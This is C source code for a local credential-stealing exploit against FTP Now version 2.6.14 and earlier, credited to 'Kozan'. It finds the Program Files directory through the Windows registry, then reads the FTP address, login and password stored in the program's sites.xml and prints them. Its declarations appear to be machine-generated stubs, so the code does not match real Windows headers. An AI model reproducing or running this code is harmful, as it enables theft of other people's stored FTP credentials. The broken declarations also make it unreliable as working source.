
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int LPBYTE ;


 scalar_t__ BUFSIZE ;
 scalar_t__ ERROR_SUCCESS ;
 int HKEY_LOCAL_MACHINE ;
 int KEY_QUERY_VALUE ;
 int RegCloseKey (int ) ;
 scalar_t__ RegOpenKeyEx (int ,char*,int ,int ,int *) ;
 scalar_t__ RegQueryValueEx (int ,char*,int *,int *,int ,scalar_t__*) ;
 scalar_t__ dwBufLen ;
 int exit (int) ;
 int hKey ;
 scalar_t__ lRet ;
 int oku (scalar_t__,char*) ;
 scalar_t__ prgfiles ;
 int printf (char*,...) ;
 int strcat (scalar_t__,char*) ;
 int strcpy (char*,int ) ;

int main()
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "ProgramFilesDir", ((void*)0), ((void*)0),
                                                      (LPBYTE) prgfiles, &dwBufLen);

       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
               {
                       RegCloseKey(hKey);
                       printf("An error occured!\n");
           exit(1);
       }

       RegCloseKey(hKey);

   }
       else
       {
       RegCloseKey(hKey);
               printf("An error occured!\n");
       exit(1);
   }

       strcat(prgfiles,"\\FTP Now\\sites.xml");

       printf("FTP Now <= v2.6.14 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
       printf("This exploit only show the first profile and its password.\n");
       printf("You may improve it freely...\n\n");

       char FtpAddress[BUFSIZE], FtpUsername[BUFSIZE], FtpPassword[BUFSIZE];

       strcpy(FtpAddress,oku(prgfiles,"<ADDRESS>"));
       strcpy(FtpUsername,oku(prgfiles,"<LOGIN>"));
       strcpy(FtpPassword,oku(prgfiles,"<PASSWORD>"));

       printf("Ftp Address   : %s\n",FtpAddress);
       printf("Ftp Username  : %s\n",FtpUsername);
       printf("Ftp Password  : %s\n",FtpPassword);

       return 0;
}
